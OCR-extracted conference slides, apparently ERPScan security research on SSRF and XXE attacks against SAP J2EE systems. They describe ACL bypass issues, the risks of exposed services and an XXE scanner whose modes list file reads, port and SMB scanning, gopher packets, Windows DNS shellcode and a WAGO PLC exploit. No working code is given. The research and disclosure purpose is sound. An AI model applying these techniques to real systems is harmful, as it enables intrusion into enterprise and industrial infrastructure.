— tcp.validnode_checking = yes 

— tcp.invited_nodes = (hostnamel, hostname2) 

— tcp.excluded_nodes = (other) 

• The same problems for bypassing as in Message 
Server 

• Still investigating 

_J 
















other remote services 




• Dozens of different SAP services 

- More than 10 in ABAP 

- More than 20 in J2EE 

- More that 20 others 

• All of them are enabled by default and can have some Issues 

• Can be secured by firewalls sometimes 

• Can be secured by ACLs 

• Some vulnerabilities reported by us still not patched 

• Any single-packet exploit can be executed 

















SSRF threats 


• Exploit any old vulnerabilities in OS or database because 
systems secured by firewall usually lack patches 

• Exploit old SAP Application vulnerabilities 

• Bypass SAP security restrictions 

• A way to open new vulnerabilities 
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A way to open new vulnerabilities 




: 

• Before XML Tunneling, vulnerabilities in the local 
services which only listen 127.0.0.1 were not 
interesting 


• Now they are more likely to be exploited 


• It is another area for research 


















Conclusion? 


Let's put it under a firewall 
is not a solution anymore 






XXE Scanner 



Found an XML Interface and want to try if it is 
vulnerable to XXE? 


Or 


Or 


Found an XXE in some project and want to know 
which attacks are possible? 

Found an XXE, and know a vulnerable service 
inside the company, and want to exploit it? 
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How is it working? 

___ ^ 


• You enter a vulnerable URL 

• You enter test case 

• You customize the predefined XML or SOAP 
format 


J 














Choosing action 

• Test 

- Test if XXE is working 

• Scan 

- Scan for available information 

• Attack 

- Exploit SSRF or chained attack 




y 













Action: Test 

_ J 

1. Test for local file read 

2. Test for remote share read 

3. Test for HTTP scheme support 

4. Brute for different schemes support 

_ ) 


If tests are OK you can collect the information now 


















Action: Scan 

1. Bruteforce and download files 

2. Directory listing 

3. Port scan 

4. SMB shares scan 

5. HTTP URL scan 
















Action: Exploit 

__J 
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1 . 

2 . 

3. 

4. 


Send a custom SSRF HTTP packet 
Send a custom TCP packet by gopher 
Exploit Windows OS + DNS shellcode 
Exploit WAGO PLC 


y 


Soon, others may appear. 


























Conclusion 


r 




• SSRF attacks are very dangerous 

• They have a very wide range still poorly covered 

• Gopher example is not the only one I suppose 

• We only look at some SAP J2EE engine issues 

• Just with a brief look at current security options they 
were broken 

• ERPScan is working closely with SAP to fix this and 
other architectural problems in SAP applications 


All application servers based on JRE are vulnerable! 
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